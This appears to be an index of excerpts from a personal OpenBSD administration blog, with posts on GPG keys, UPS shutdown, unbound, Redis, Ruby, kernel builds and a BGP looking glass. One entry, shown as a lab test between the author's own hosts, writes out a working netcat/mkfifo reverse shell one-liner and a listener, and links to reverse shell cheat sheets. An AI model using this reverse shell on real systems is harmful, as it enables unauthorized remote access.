OpenBSD

GPG and how to use it Create a Key with ECC gpg --expert --full-generate-key (9) ECC and ECC (1) Curve 25519 0 = key does not expire (or whatever you prefer!) Real name: Max Muster Email address: max@muster.net Comment: - pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E uid Max Muster (-) <max@muster.net> sub cv25519 2022-09-04 [E] Public Key max@host $ gpg /home/max/.gnupg/pubring.kbx ---------------------------- pub ed25519 2022-09-04 [SC] 256ADFCEBD49C20DFACDCCABADA0F56BC7B20E6E uid [ultimate] Max Muster (-) <max@muster.

Reverse Shells https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md https://kb.systemoverlord.com/security/postex/reverse/ Test it Listen on Host A Set Lister on Host A (192.168.1.100) hostA # nc -l 4242 Start Reverse Shell on Host B hostB # rm /tmp/f; mkfifo /tmp/f; /bin/sh -i 2>&1 </tmp/f |nc 192.168.1.100 4242 >/tmp/f here we are hostA # hostname hostA.somewhere hostA # nc -l 4242 hostB # hostname hostB.somewhere nice ;) sha256: 0a5d01e633e102b0f3e258db89028946a247ef2296eab8dbf8819bc7472779c3

some cool pages about OpenBSD https://www.openbsd.org https://man.openbsd.org https://www.openbsdfoundation.org https://marc.info https://undeadly.org/cgi?action=front https://bsdly.blogspot.com/ https://obsd.solutions/en/blog/ https://dataswamp.org/~solene/ https://blog.apnic.net/2021/10/28/openbsd-part-1-how-it-all-started/ + https://blog.apnic.net/2021/11/05/openbsd-part-2-why-use-openbsd/ https://vincentdelft.be/category/openbsd http://ratfactor.com/openbsd/2022-08-02-install https://blog.lambda.cx/tags/openbsd/ https://www.openbsdjumpstart.org/#/ https://blog.lambda.cx/posts/openbsd-introduction-talk/openbsd-introduction.pdf https://why-openbsd.rocks/fact/ https://openbsdrouterguide.net/ sha256: a86099a13463c50993ce9fa2d75543daf1888454259f04daab6240c8a6dec7e9

Shutdown Hosts on Power Outages Everybody is talking about Power Outages. Let’s assume you have a Smart-UPS for your Playground and you’d like to shut some Infrastructure to avoid some troubles with corrupt filesystems, broken vm’s and things like that. Connection UPS to APU via USB Cable dmesg show the UPS connected APU# dmesg uhidev0 at uhub0 port 3 configuration 1 interface 0 "American Power Conversion Smart-UPS_1500 ... uhidev0: iclass 3/0, 142 report ids upd0 at uhidev0 uhid0 at uhidev0 reportid 1: input=0, output=0, feature=1 uhid1 at uhidev0 reportid 2: input=0, output=0, feature=1 .

Intro I never used the Fulldisk Encryption Feature as there was no need for. It doesn’t make sense for Hosted VM’s, as you have to enter the Passphrase at every boot at the Console. So, it’s a pain and still possible to intercept on the Hosters Infrastructure. Disk Encryption does not make sense at home, as all my Devices remains at home (and hopefully never got stolen). It would make sense on a Notebook, but i’m more the Apple Fanboy when it comes to portable Machines.

how to build json from cli we all like json, do we ? https://kellyjonbrazil.github.io/jc/docs/parsers/ping add package doas pkg_add jc try ping openbsd-box # ping -c 3 1.1.1.1 |jc --ping -p 2>/dev/null { "destination_ip": "1.1.1.1", "data_bytes": 56, "pattern": null, "destination": "1.1.1.1", "packets_transmitted": 3, "packets_received": 3, "packet_loss_percent": 0.0, "duplicates": 0, "round_trip_ms_min": 9.219, "round_trip_ms_avg": 9.826, "round_trip_ms_max": 10.158, "round_trip_ms_stddev": 0.43, "responses": [ { "type": "reply", "bytes": 64, "response_ip": "1.1.1.1", "icmp_seq": 0, "ttl": 59, "time_ms": 10.

Enable Logging for Unbound update unbound.conf /var/unbound/etc/unbound.conf server: logfile: /log/unbound.log verbosity: 1 log-queries: yes ... create folder/logfile log=/var/unbound/log/unbound.log doas mkdir /var/unbound/log/ touch $log chmod 660 $log chown _unbound:_unbound $log restart service doas rcctl restart unbound tail logfile tail -f /var/unbound/log/unbound.log # tail -f /var/unbound/log/unbound.log [1660208341] unbound[3279:0] notice: init module 0: validator [1660208341] unbound[3279:0] notice: init module 1: iterator [1660208341] unbound[3279:0] info: start of service (unbound 1.15.0). [1660208344] unbound[3279:0] info: xxx.xxx.xxx.xxx time.

How to Enable Remote Control for Unbound Setup Remote Control doas unbound-control-setup $ doas unbound-control-setup setup in directory /var/unbound/etc Generating RSA private key, 3072 bit long modulus ..................................++++ ..................................++++ e is 010001 (0x65537) Generating RSA private key, 3072 bit long modulus ........................................++++ ........................................++++ e is 010001 (0x65537) Signature ok subject=/CN=unbound-control Getting CA Private Key removing artifacts Setup success. Certificates created. Enable in unbound.conf file to use Enable in unbound.conf /var/unbound/etc/unbound.conf

stumpled upon some thing cool, htmlq! It’s like jq, but for HTML. Installation Rust htmlq need rust. so, let’s install rust first. doas pkg_add rust Add Link to Path cat << 'EOF' |doas tee -a /etc/profile # Rust/Cargo export PATH=$PATH:/root/.cargo/bin EOF . /etc/profile Install HTMLQ doas cargo install htmlq some Examples Extract Links curl -s https://www.openbsd.org | htmlq --attribute href a |head Example user@nixbox$ curl -s https://www.openbsd.org | htmlq --attribute href a |head goals.

there are a few Weeks until OpenBSD 7.2 will get released. Anyhow, running current is a good way to get a “preview” what’s in the pipeline and will come soon. one of the painpoint was update packages on OpenBSD. Not because it was difficult, but it took quite a lot of time. Specially, when you run a bunch of machines in different networks. Version and Time consumption sysctl kern.version pkg_info |wc -l time pkg_add -Vu OpenBSD 7.

let’s play a bit with Redis. A In-Memory Data Store for Caching, Streaming, Message Broker https://redis.io/ Install doas rcctl add redis doas rcctl enable redis doas rcclt restart redis Package Summary what did we got installed ? doas pkg_info -L redis $ doas pkg_info -L redis Information for inst:redis-6.2.7 Files: /etc/rc.d/redis /usr/local/bin/redis-benchmark /usr/local/bin/redis-check-aof /usr/local/bin/redis-check-rdb /usr/local/bin/redis-cli /usr/local/bin/redis-sentinel /usr/local/bin/redis-server /usr/local/share/examples/redis/redis.conf /usr/local/share/examples/redis/sentinel.conf A Server, a Client, a configuration File, … Keep Alive send a ping …

https://github.com/Bratela/openbsd Install Ruby Install Ruby and set Symlinks doas su - pkg_add ruby-3.1.2 ln -sf /usr/local/bin/ruby31 /usr/local/bin/ruby ln -sf /usr/local/bin/bundle31 /usr/local/bin/bundle ln -sf /usr/local/bin/bundler31 /usr/local/bin/bundler ln -sf /usr/local/bin/erb31 /usr/local/bin/erb ln -sf /usr/local/bin/gem31 /usr/local/bin/gem ln -sf /usr/local/bin/irb31 /usr/local/bin/irb ln -sf /usr/local/bin/rdoc31 /usr/local/bin/racc ln -sf /usr/local/bin/rake31 /usr/local/bin/rake ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rbs ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rdbg ln -sf /usr/local/bin/rdoc31 /usr/local/bin/rdoc ln -sf /usr/local/bin/ri31 /usr/local/bin/ri ln -sf /usr/local/bin/typeprof31 /usr/local/bin/typeprof Install Nokogiri pkg_add ruby31-nokogiri-1.13.1p0 Install Rails pkg_add ruby-3.

Let’s Compile a Custom Kernel for OpenBSD … and let’s check if we can tune the Process it with multiple Processors. get Sources and prepare Custom Kernel cd /usr/src ftp https://cdn.openbsd.org/pub/OpenBSD/$(uname -r)/sys.tar.gz tar xfz sys.tar.gz rm xfz sys.tar.gz cd /sys/arch/$(uname -m)/conf cp GENERIC.MP CUSTOM.MP config CUSTOM.MP cd ../compile/CUSTOM.MP -> with config CUSTOM.MP, you can enable disable Components which will be built into your Custom Kernel. Wlan Drives for a VirtualServer, as example, does not make sense.

BGP Looking Glass with OpenBSD something I’ve wanted to do for a long time and never got around to it … Just give a try, it’s public available: https://bgp.stoege.net/ Prerequisite OpenBSD VM (at least 2G RAM) Public IPv4 / IPv6 DNS Record / Static IP Full BGP Feed (don’t worry, you can get it for free) httpd config OpenBSD got their own HTTP Daemon in Base System. Let’s enable and configure it.

OpenBSD 7.1 released ! … a while ago. I upgraded all my boxes since quite a while, but i didn’t write a short post about it. There is nothing really unexpected, a stable, easy, straigh-forward development of my favourite OS, except that there is a need for more than 1G Free Disk Space in /var. That was a bit a problem for smalled Boxes like the APU with 16G Disk …